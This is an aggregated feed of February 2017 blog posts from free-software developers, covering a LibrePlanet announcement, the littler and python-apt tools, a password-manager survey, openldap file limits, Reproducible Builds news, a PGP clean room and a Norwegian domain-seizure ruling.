Day two will begin with Cory Doctorow, science fiction author and special consultant to the Electronic Frontier Foundation, revealing how to eradicate all Digital Restrictions Management (DRM) in a decade. The conference will draw to a close with Sumana Harihareswara, leader, speaker, and advocate for free software and communities, giving a talk entitled "Lessons, Myths, and Lenses: What I Wish I'd Known in 1998."

That's not all. We'll hear about the GNU philosophy from Marianne Corvellec of the French free software organization April, Joey Hess will touch on encryption with a talk about backing up your GPG keys, and Denver Gingerich will update us on a crucial free software need: the mobile phone.

Others will look at ways to grow the free software movement: through cross-pollination with other activist movements, removal of barriers to free software use and contribution, and new ideas for free software as paid work.

-- Here's a sneak peek at LibrePlanet 2017: Register today!

I'll be giving some varient of the keysafe talk from Linux.Conf.Au. By the way, videos of my keysafe and propellor talks at Linux.Conf.Au are now available, see the talks page.




Dirk Eddelbuettel: littler 0.3.2

Fri, 17 Feb 2017 01:20:00 +0000

The third release of littler as a CRAN package is now available, following in the now more than ten-year history as a package started by Jeff in the summer of 2006, and joined by me a few weeks later. littler is the first command-line interface for R and predates Rscript. It is still faster, and in my very biased eyes better as it allows for piping as well shebang scripting via #!, uses command-line arguments more consistently and still starts faster. It prefers to live on Linux and Unix, has its difficulties on OS X due to yet-another-braindeadedness there (who ever thought case-insensitive filesystems where a good idea?) and simply does not exist on Windows (yet -- the build system could be extended -- see RInside for an existence proof, and volunteers welcome!). This release brings several new examples script to run package checks, use the extraordinary R Hub, download RStudio daily builds, and more -- see below for details. No internals were changed. The NEWS file entry is below. Changes in littler version 0.3.2 (2017-02-14) Changes in examples New scripts getRStudioServer.r and getRStudioDesktop.r to download daily packages, currently defaults to Ubuntu amd64 New script c4c.r calling rhub::check_for_cran() New script rd2md.r to convert Rd to markdown. New script build.r to create a source tarball. The installGitHub.r script now use package remotes (PR #44, #46) Courtesy of CRANberries, there is a comparison to the previous release. Full details for the littler release are provided as usual at the ChangeLog page. The code is available via the GitHub repo, from tarballs off my littler page and the local directory here -- and now of course all from its CRAN page and via install.packages("littler"). Binary packages are available directly in Debian as well as soon via Ubuntu binaries at CRAN thanks to the tireless Michael Rutter. Comments and suggestions are welcome at the GitHub repo. This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. Please report excessive re-aggregation in third-party for-profit settings. [...]



Craig Sanders: New D&D Cantrip

Thu, 16 Feb 2017 08:01:36 +0000

Name: Alternative Fact
Level: 0
School: EN
Time: 1 action
Range: global, contagious
Components: V, S, M (one racial, cultural or religious minority to blame)
Duration: Permanent (irrevocable)
Classes: Cleric, (Grand) Wizard, Con-man Politician

The caster can tell any lie, no matter how absurd or outrageous (in fact, the more outrageous the better), and anyone hearing it (or hearing about it later) with an INT of 10 or less will believe it instantly, with no saving throw. They will defend their new belief to the death – theirs or yours.

This belief can not be disbelieved, nor can it be defeated by any form of education, logic, evidence, or reason. It is completely incurable. Dispel Magic does not work against it, and Remove Curse is also ineffectual.

New D&D Cantrip is a post from: Errata




Antoine Beaupré: A look at password managers

Wed, 15 Feb 2017 17:00:00 +0000

As we noted in an earlier article, passwords are a liability and we'd prefer to get rid of them, but the current reality is that we do use a plethora of passwords in our daily lives. This problem is especially acute for technology professionals, particularly system administrators, who have to manage a lot of different machines. But it also affects regular users who still use a large number of passwords, from their online bank to their favorite social-networking site. Despite the remarkable memory capacity of the human brain, humans are actually terrible at recalling even short sets of arbitrary characters with the precision needed for passwords. Therefore humans reuse passwords, make them trivial or guessable, write them down on little paper notes and stick them on their screens, or just reset them by email every time. Our memory is undeniably failing us and we need help, which is where password managers come in. Password managers allow users to store an arbitrary number of passwords and just remember a single password to unlock them all. But there is a large variety of password managers out there, so which one should we be using? At my previous job, an inventory was done of about 40 different free-software password managers in different stages of development and of varying quality. So, obviously, this article will not be exhaustive, but instead focus on a smaller set of some well-known options that may be interesting to readers. KeePass: the popular alternative The most commonly used password-manager design pattern is to store passwords in a file that is encrypted and password-protected. The most popular free-software password manager of this kind is probably KeePass. An important feature of KeePass is the ability to auto-type passwords in forms, most notably in web browsers. This feature makes KeePass really easy to use, especially considering it also supports global key bindings to access passwords. KeePass databases are designed for simultaneous access by multiple users, for example, using a shared network drive. KeePass has a graphical interface written in C#, so it uses the Mono framework on Linux. A separate project, called KeePassX is a clean-room implementation written in C++ using the Qt framework. Both support the AES and Twofish encryption algorithms, although KeePass recently added support for the ChaCha20 cipher. AES key derivation is used to generate the actual encryption key for the database, but the latest release of KeePass also added using Argon2, which was the winner of the July 2015 password-hashing competition. Both programs are more or less equivalent, although the original KeePass seem to have more features in general. The KeePassX project has recently been forked into another project now called KeePassXC that implements a set of new features that are pres[...]



Antoine Beaupré: A look at password managers

Wed, 15 Feb 2017 17:00:00 +0000

As we noted in an earlier article, passwords are a liability and we'd prefer to get rid of them, but the current reality is that we do use a plethora of passwords in our daily lives. This problem is especially acute for technology professionals, particularly system administrators, who have to manage a lot of different machines. But it also affects regular users who still use a large number of passwords, from their online bank to their favorite social-networking site. Despite the remarkable memory capacity of the human brain, humans are actually terrible at recalling even short sets of arbitrary characters with the precision needed for passwords. Therefore humans reuse passwords, make them trivial or guessable, write them down on little paper notes and stick them on their screens, or just reset them by email every time. Our memory is undeniably failing us and we need help, which is where password managers come in. Password managers allow users to store an arbitrary number of passwords and just remember a single password to unlock them all. But there is a large variety of password managers out there, so which one should we be using? At my previous job, an inventory was done of about 40 different free-software password managers in different stages of development and of varying quality. So, obviously, this article will not be exhaustive, but instead focus on a smaller set of some well-known options that may be interesting to readers. KeePass: the popular alternative The most commonly used password-manager design pattern is to store passwords in a file that is encrypted and password-protected. The most popular free-software password manager of this kind is probably KeePass. An important feature of KeePass is the ability to auto-type passwords in forms, most notably in web browsers. This feature makes KeePass really easy to use, especially considering it also supports global key bindings to access passwords. KeePass databases are designed for simultaneous access by multiple users, for example, using a shared network drive. KeePass has a graphical interface written in C#, so it uses the Mono framework on Linux. A separate project, called KeePassX is a clean-room implementation written in C++ using the Qt framework. Both support the AES and Twofish encryption algorithms, although KeePass recently added support for the ChaCha20 cipher. AES key derivation is used to generate the actual encryption key for the database, but the latest release of KeePass also added using Argon2, which was the winner of the July 2015 password-hashing competition. Both programs are more or less equivalent, although the original KeePass seem to have more features in general. The KeePassX project has recently been forked into another project now called KeePassXC that implements a set of[...]



Holger Levsen: Debian has installer images with non-free firmware included

Wed, 15 Feb 2017 10:05:20 +0000

(image)

Even though they are impossible to find without using a search engine or bookmarks, they exist.

Bookmark them now. Or use a search engine later (image)




Jamie McClelland: Re-thinking Web App Security

Wed, 15 Feb 2017 02:21:54 +0000

An organizer friend interested in activating a rapid response network to counter Trump-era ICE raids on immigrants asked me about any existing simple and easy tools that could send out emergency SMS/text message alerts. I thought about it and ended up writing my first pouchdb web application to accomplish the task. For the curious, you can see it in action and browse the source code. To use it to send SMS, you have to register for a Twilio account - you can get a free account that has very restricted SMS sending capability or pay for full functionality. The project is unlike anything I have done before. I chose pouchdb because it stores all of your contacts in your browser not on a server somewhere in the so-called cloud. (You can also choose to sync to a server, a feature I have not yet implemented.) The implications of storing your data locally are quite profound. Classic Web App Let's first consider the more common web application: You visit a web site (the same web site that your colleagues visit, or in the case of a massive application like gmail.com, the same web site that everyone in the world visits). Then, you login with your own unique username and password, which grants you access to the portion the database that you are suppose to have access to. For most use-cases, this model is fairly ideal: If you have a technically competent host, your data is backed up regularly and the database is available nearly 100% of the time If you have a politically trust-worthy host, your host will notify you and put up a fight before turning any of your data over to a government agent If you drop your phone in the toilet you can always login from another computer to access your data If you save your password in your browser and your laptop is stolen, you can always change your password to prevent the thief from accessing your data You can easily share your data with others by creating new usernames and passwords However, there are some downsides: If your host is not technically competent or polically trust-worthy, you could lose all of your data to a hard drive crash or subpoena Even if your host is competent, all of your data is one previously undiscovered vulnerability away from being hacked Even if your host is politically trust-worthy, you cannot always stop a subpoena, particularly given the legal escalations of tools like national security letters pouchdb no sync Assuming you are accessing your database on a device with an encrypted disk and you manage your own backups, pouchdb without synchoronizing provides the most privacy and autonomy. You have complete control of your data and you are not dependent on any server operator. However, the trade-offs are harsh: Availability: if you lose[...]



Clint Adams: Tom's birthday happens every year

Wed, 15 Feb 2017 00:57:09 +0000

(image)

“Sure,” she said, while having a drink for breakfast at the post office.

Posted on 2017-02-15
Tags: mintings



Daniel Stender: APT programming snippets for Debian system maintenance

Wed, 15 Feb 2017 00:00:00 +0000

The Python API for the Debian package manager APT is useful for writing practical system maintenance scripts, which are going beyond shell scripting capabilities. There are Python2 and Python3 libraries for that available as packages, as well as a documentation in the package python-apt-doc. If that’s also installed, the documentation then could be found in /usr/share/doc/python-apt-doc/html/index.html, and there are also a couple of example scripts shipped into /usr/share/doc/python-apt-doc/examples. The libraries mainly consists of Python bindings for the libapt-inst and libapt-pkg C++ core libraries of the APT package manager, which makes it processing very fast. Debugging symbols are also available as packages (python{,3}-apt-dbg). The module apt_inst provides features like reading from binary packages, while apt_pkg resembles the functions of the package manager. There is also the apt abstraction layer which provides more convenient access to the library, like apt.cache.Cache() could be used to behave like apt-get: from apt.cache import Cache mycache = Cache() mycache.update() # apt-get update mycache.open() # re-open mycache.upgrade(dist_upgrade=True) # apt-get dist-upgrade mycache.commit() # apply boil out selections As widely known, there is a feature of dpkg which helps to move a package inventory from one installation to another by just using a text file with a list of installed packages. A selections list containing all installed package could be easily generated with $ dpkg --get-selections > selections.txt. The resulting file then looks something similar like this: $ cat selections.txt 0ad install 0ad-data install 0ad-data-common install a2ps install abi-compliance-checker install abi-dumper install abigail-tools install accountsservice install acl install acpi install The counterpart for this operation (--set-selections) could be used to reinstall (add) the complete package inventory on another installation resp. computer (that needs superuser rights), like that’s explained in the manpage dpkg(1). No problem so far. The problem is, if that list contains a package which couldn’t be found in any of the package inventories which are set up in /etc/apt/sources.list(.d/) on the target system, dpkg stops the whole process: # dpkg --set-selections < selections.txt dpkg: warning: package not in database at line 524: google-[...]



Julian Andres Klode: jak-linux.org moved / backing up

Tue, 14 Feb 2017 23:52:58 +0000

In the past two days, I moved my main web site jak-linux.org (and jak-software.de) from a very old contract at STRATO over to something else: The domains are registered with INWX and the hosting is handled by uberspace.de. Encryption is provided by Let’s Encrypt. I requested the domain transfer from STRATO on Monday at 16:23, received the auth codes at 20:10 and the .de domain was transferred completely on 20:36 (about 20 minutes if you count my overhead). The .org domain I had to ACK, which I did at 20:46 and at 03:00 I received the notification that the transfer was successful (I think there was some registrar ACKing involved there). So the whole transfer took about 10 1/2 hours, or 7 hours since I retrieved the auth code. I think that’s quite a good time And, for those of you who don’t know: uberspace is a shared hoster that basically just gives you an SSH shell account, directories for you to drop files in for the http server, and various tools to add subdomains, certificates, virtual users to the mailserver. You can also run your own custom build software and open ports in their firewall. That’s quite cool. I’m considering migrating the blog away from wordpress at some point in the future – having a more integrated experience is a bit nicer than having my web presence split over two sites. I’m unsure if I shouldn’t add something like cloudflare there – I don’t want to overload the servers (but I only serve static pages, so how much load is this really going to get?). in other news: off-site backups I also recently started doing offsite backups via borg to a server operated by the wonderful rsync.net. For those of you who do not know rsync.net: You basically get SSH to a server where you can upload your backups via common tools like rsync, scp, or you can go crazy and use git-annex, borg, attic; or you could even just plain zfs send your stuff there. The normal price is $0.08 per GB per month, but there is a special borg price of $0.03 (that price does not include snapshotting or support, really). You can also get a discounted normal account for $0.04 if you find the correct code on Hacker News, or other discounts for open source developers, students, etc. – you just have to send them an email. Finally, I must say that uberspace and rsync.net feel similar in spirit. Both heavily emphasise the command line, and don’t really have any fancy click stuff. I like that.Filed under: General [...]



Steve McIntyre: Start the fans please!

Tue, 14 Feb 2017 23:32:00 +0000

(image)

This probably won't mean much to people outside the UK, I'm guessing. Sorry! :-)

The Crystal Maze was an awesome fun game show on TV in the UK in the 1990s. Teams would travel through differently-themed zones, taking on challenges to earn crystals for later rewards in the Crystal Dome. I really enojyed it, as did just about everybody my age that I know of...

A group have started up a new Crystal Maze attraction in London and Manchester, giving some of us a chance of indulging our nostalgia directly in a replica of the show's setup! Neil NcGovern booked a load of tickets and arranged for a large group of people to go along this weekend.

It was amazing! (Sorry!) I ended up captaining one of the 4 teams, and our team ("Failure is always an option!") scored highest in the final game - catching bits of gold foil flying around in the Dome. It was really, really fun and I'd heartily recommend it to other folks who like action games and puzzle solving.

(image)

I just missed the biting scorn of the original show presenter, Richard O'Brien, but our "Maze Master" Boudica was great fun and got us all pumped up and working together.




Sven Hoexter: moto g falcon up and running with LineageOS 14.1 nightly

Tue, 14 Feb 2017 09:23:07 +0000

After a few weeks of running Exodus on my moto g falcon, I've now done again the full wipe and moved on to LineageOS nightly from 20170213. Though that build is no longer online at the moment. It's running smooth so far for myself but there was an issue with the Google Play edition of the phone according to Reddit. Since I don't use gapps anyway I don't care.

The only issue I see so far is that I can not reach the flash menu in the camera app. It's hidden behind a grey bar. Not nice but not a show stopper for me either.




Arturo Borrero González: About process limits

Tue, 14 Feb 2017 08:24:00 +0000

The other day I had to deal with an outage in one of our LDAP servers, which is running the old Debian Wheezy (yeah, I know, we should update it). We are running openldap, the slapd daemon. And after searching the log files, the cause of the outage was obvious: [...] slapd[7408]: warning: cannot open /etc/hosts.allow: Too many open files slapd[7408]: warning: cannot open /etc/hosts.deny: Too many open files slapd[7408]: warning: cannot open /etc/hosts.allow: Too many open files slapd[7408]: warning: cannot open /etc/hosts.deny: Too many open files slapd[7408]: warning: cannot open /etc/hosts.allow: Too many open files slapd[7408]: warning: cannot open /etc/hosts.deny: Too many open files [...] [Please read “About process limits, round 2” for updated info on this issue] I couldn’t believe that openldap is using tcp_wrappers (or libwrap), an ancient software piece that hasn’t been updated for years, replaced in many other ways by more powerful tools (like nftables). I was blinded by this and ran to open a Debian bug agains openldap: #854436 (openldap: please don’t use tcp-wrappers with slapd). The reply from Steve Langasek was clear: If people are hitting open file limits trying to open two extra files, disabling features in the codebase is not the correct solution. Obvoursly, the problem was somewhere else. I started investigating about system limits, which seems to have 2 main components: system-wide limits (you tune these via sysctl, they live in the kernel) user/group/process limits (via limits.conf, ulimit and prlimit) According to my searchings, my slapd daemon was being hit by the latter. I reviewed the default system-wide limits and they seemed Ok. So, let’s change the other limits. Most of the documentantion around the internet points you to a /etc/security/limits.conf file, which is then read by pam_limits. You can check current limits using the ulimit bash builtin. In the case of my slapd: arturo@debian:~% sudo su openldap -s /bin/bash openldap@debian:~% ulimit -a core file size (blocks, -c) 0 data seg size (kbytes, -d) unlimited scheduling priority (-e) 0 file size (blocks, -f) unlimited pending signals (-i) 7915 max locked memory (kbytes, -l) 64 max memory size (kbytes, -m) unlimited open files (-n) 1024 pipe size (512 bytes, -p) 8 POSIX message queues (bytes, -q) 819200 real-time priority (-r) 0 stack size (kbytes, -s) 8192 cpu time (seconds, -t) u[...]



Reproducible builds folks: Reproducible Builds: week 94 in Stretch cycle

Tue, 14 Feb 2017 00:19:05 +0000

Here's what happened in the Reproducible Builds effort between Sunday February 5 and Saturday February 11 2017: Upcoming events Holger proposed a hackathon with various possible dates -- please reply with your preferred dates! "Reproducible builds: Status update" CfP submitted for Debconf17 in Montreal. Patches sent upstream pnmixer (Chris Lamb) cloud-sptheme (Chris Lamb) python-hypothesis (Chris Lamb) cython (Jelmer Vernooij) Packages reviewed and fixed, and bugs filed Chris Lamb: #854332 filed against cloud-sptheme. #854512 filed against ftpcopy. #854549 filed against python-hypothesis. Daniel Shahaf: #854492 filed against xlsx2csv. #854541 filed against sogo. "Z. Ren": #854293 filed against manpages-tr. #854294 filed against regina-rexx. #854362 filed against fonts-uralic. Reviews of unreproducible packages 83 package reviews have been added, 8 have been updated and 32 have been removed in this week, adding to our knowledge about identified issues. 5 issue types have been added: randomness_in_swf_files_generated_by_as3compile randomness_in_t3g_files_generated_tslmendian absolute_build_paths_in_dot_packlist_file_generated_by_perl_extutils_packlist formatdb_from_ncbi_blastplus_captures_build_time timestamp_and_build_path_captured_by_python_cheetah 1 issue type has been updated: build_id_differences_only Weekly QA work During our reproducibility testing, the following FTBFS bugs have been detected and reported by: Chris Lamb (7) gregory bahde (1) diffoscope development diffoscope versions 71, 72, 73, 74 & 75 were uploaded to unstable by Chris Lamb: Chris Lamb: New features: Add --exclude option. (Closes: #854783) Apply --max-report-size to --text reports. (Closes: #851147) Add a machine-readable JSON output format. (Closes: #850791) Show results from debugging packages last (Closes: #820427) Specify lang="en" in HTML output. (re. #849411) Bug fixes: Fix errors when comparing directories with non-directories. (Closes: #835641) Clean all temp files in signal handler thread instead of attempting to bubble exception back to the main thread. (Closes: #852013) Correct logic of module_exists, ensuring we correctly skip tests when python3-debian is not installed. (Closes: #854745) Extract archive members using an auto-incrementing integer, avoiding the need to sanitise filenames. (Closes: #854723) Importing submodules (ie. parent.child) will attempt to import parent so we must catch that. (Closes: #854670) Add missing Recommends for comparators. (Closes: #854655) Devi[...]



Elizabeth Ferdman: 10 Week Progress Update for PGP Clean Room

Tue, 14 Feb 2017 00:00:00 +0000

This Valentine’s Day I’m giving everyone the gift of GIFs! Because who wants to stare at a bunch of code? Or read words?! I’ll make this short and snappy since I’m sure you’re looking forward to a romantic night with your terminal.

A script called create-raid already exists in the main repository so I decided to add an activity for that in the main menu.

(image)


Here’s what the default activity for creating the master and subkeys will look like:

(image)


This activity should make key generation faster and more convenient for the user. The dialog allows the user to enter additional UIDs at the same time as she initially creates the keys (there’s another activity for adding UIDs later). The dialog won’t ask for a comment in the UID, just name and email.

The input boxes come with some defaults that were outlined in the wiki for this project, such as rsa4096 for the master and 1y for the expiry. However the user can still enter her own values for fields like algo and expiry. The user won’t customize usage here, though. There should be separate activities for creating a custom primary and custom subkeys. Here, the user creates a master key [SC], an encryption key [E], and optionally an additional signing [SC], encryption [E], and authentication key [A].

The last three weeks of the internship will consist of implementing more of the frontend dialogs for the activities in the main menu, validating user input, and testing.

Thanks for reading <3




Vincent Sanders: The minority yields to the majority!

Mon, 13 Feb 2017 23:01:29 +0000

Deng Xiaoping (who succeeded Mao) expounded this view and obviously did not depend on a minority to succeed. In open source software projects we often find ourselves implementing features of interest to a minority of users to keep our software relevant to a larger audience.As previously mentioned I contribute to the NetSurf project and the browser natively supports numerous toolkits for numerous platforms. This produces many challenges in development to obtain the benefits of a more diverse user base. As part of the recent NetSurf developer weekend we took the opportunity to review all the frontends to make a decision on their future sustainability.Each of the nine frontend toolkits were reviewed in turn and the results of that discussion published. This task was greatly eased because we we able to hold the discussion face to face, over time I have come to the conclusion some tasks in open source projects greatly benefit from this form of interaction.Coding and day to day discussions around it can be easily accommodated va IRC and email. Decisions affecting a large area of code are much easier with the subtleties of direct interpersonal communication. An example of this is our decision to abandon the cocoa frontend (toolkit used on Mac OS X) against that to keep the windows frontend.The cocoa frontend was implemented by Sven Weidauer in 2011, unfortunately Sven did not continue contributing to this frontend afterwards and it has become the responsibility of the core team to maintain. Because NetSuf has a comprehensive CI system that compiles the master branch on every commit any changes that negatively affected the cocoa frontend were immediately obvious.Thus issues with the compilation were fixed promptly but because these fixes were only ever compile tested and at some point the Mac OS X build environments changed resulting in an application that crashes when used. Despite repeatedly asking for assistance to fix the cocoa frontend over the last eighteen months no one had come forward.And when the topic was discussed amongst the developers it quickly became apparent that no one had any objections to removing the cocoa support. In contrast the windows frontend, which despite having many similar issues to cocoa, we decided to keep. These were almost immediate consensus on the decision, despite each individual prior to the discussion not advocating any position.This was a single example but it highlights the benefits of a disparate development team having a physical [...]



Petter Reinholdtsen: Ruling ignored our objections to the seizure of popcorn-time.no (#domstolkontroll)

Mon, 13 Feb 2017 20:30:00 +0000

A few days ago, we received the ruling from my day in court. The case in question is a challenge of the seizure of the DNS domain popcorn-time.no. The ruling simply did not mention most of our arguments, and seemed to take everything ØKOKRIM said at face value, ignoring our demonstration and explanations. But it is hard to tell for sure, as we still have not seen most of the documents in the case and thus were unprepared and unable to contradict several of the claims made in court by the opposition. We are considering an appeal, but it is partly a question of funding, as it is costing us quite a bit to pay for our lawyer. If you want to help, please donate to the NUUG defense fund.

The details of the case, as far as we know it, is available in Norwegian from the NUUG blog. This also include the ruling itself.